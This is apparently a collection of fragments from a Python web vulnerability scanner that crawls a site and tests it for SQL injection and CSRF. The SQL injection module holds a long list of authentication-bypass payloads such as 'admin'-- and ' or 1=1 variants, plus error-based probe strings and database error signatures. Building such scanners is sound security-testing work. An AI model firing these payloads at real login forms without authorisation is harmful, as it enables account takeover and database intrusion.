def __init__(self, process, root):
self.queue = URLlist()
self.queue.put_url(root)
self.final_list = URLlist()
self.final_list.put_url(root)
db = DBAdapter()
db.update_process(process, 2) # Status: 2, crawling.
db.close_connection()
def start(self, call):
c = self.__check_call(call)
if c == 1: # Search option.
if self.__is_valid_url():
self.__check_modules()
url_list = URLlist()
db = DBAdapter()
process = db.new_process(self.url, self.user, 1,
1) # Status: 1, processing.
db.close_connection()
if process == 0: # The user has a search going on.
return {"response": False}
url_list.put_url(self.url)
for action in self.actions: # Going through the required modules by the API.
if action[
'module']: # Looking if the required module is active.
if action['number'] == 1:
from backend.modules.crawler.module import main
url_list = main(process, self.url)
else:
if action['number'] == 2:
from backend.modules.sqlinjection.module import main
main(url_list, process, self.user)
elif action['number'] == 3:
from backend.modules.csrf.module import main
main(url_list, process, self.user)
else:
continue
db = DBAdapter()
db.update_process(process, 5) # Status: 5, finished.
db.close_connection()
elif c == 2: # Get status option.
db = DBAdapter()
process = db.get_current_process_status(self.user)
db.close_connection()
if process is None:
return {"response": False}
data = {
"web": process[1],
"date": process[2],
"stype": process[0],
"status": process[3]
}
return data
else: # Wrong call.
return {"response": False}
return True # If we get here, everything was right.
def __init__(self, url_list, process, user):
self.process = process
self.user = user
if url_list is None:
self.url_list = URLlist()
else:
self.url_list = url_list
db = DBAdapter()
db.update_process(process, 4) # Status: 4, csrf search.
db.close_connection()
def __init__(self, url_list, process, user):
self.process = process
self.user = user
if url_list is None:
self.url_list = URLlist()
else:
self.url_list = url_list
db = DBAdapter()
db.update_process(process, 3) # Status: 3, SQL injection search.
db.close_connection()
# http://stackoverflow.com/questions/9626535/get-domain-name-from-url
# self.domain = "{0.scheme}://{0.netloc}/".format(urllib.parse.urlsplit(url))
# http://www.hacoder.com/2015/10/sql-injection-authentication-bypass-cheat-sheet/
self.input_data = [
'admin\'--', '\' or 1=1', ' or 1=1', 'or 1=1--', 'or 1=1#',
'or 1=1/*', 'admin\' #', 'admin\'/*', 'admin\' or \'1\'=\'1',
'admin\' or \'1\'=\'1\'--', 'admin\' or \'1\'=\'1\'#',
'admin\' or \'1\'=\'1\'/*', 'admin\'or 1=1 or \'\'=\'',
'admin\' or 1=1', 'admin\' or 1=1--', 'admin\' or 1=1#',
'admin\' or 1=1/*', 'admin\') or (\'1\'=\'1',
'admin\') or (\'1\'=\'1\'--', 'admin\') or (\'1\'=\'1\'#',
'admin\') or (\'1\'=\'1\'/*', 'admin\') or \'1\'=\'1',
'admin\') or \'1\'=\'1\'--', 'admin\') or \'1\'=\'1\'#',
'admin\') or \'1\'=\'1\'/*', 'admin" --', 'admin" #', 'admin"/*',
'admin" or "1"="1', 'admin" or "1"="1"--', 'admin" or "1"="1"#',
'admin" or "1"="1"/*', 'admin"or 1=1 or ""="', 'admin" or 1=1',
'admin" or 1=1--', 'admin" or 1=1#', 'admin" or 1=1/*',
'admin") or ("1"="1', 'admin") or ("1"="1"--',
'admin") or ("1"="1"#', 'admin") or ("1"="1"/*',
'admin") or "1"="1', 'admin") or "1"="1"--', 'admin") or "1"="1"#',
'admin") or "1"="1"/*'
]
self.error_based_sqli_param_data = [
'\'', 'A%\' and 1=1--', 'A%\' and 1=2--'
]
# self.serialized_param_data = []
# https://www.owasp.org/images/5/52/OWASP_Testing_Guide_v4.pdf, page 111.
self.sql_errors = {
'MySQL': 'you have an error in your sql syntax',
'MSSQL': 'microsoft sql native client error',
'Oracle': 'ora-00933: sql command not properly ended',
'PostgreSQL': 'query failed: error: syntax error at or near'
}
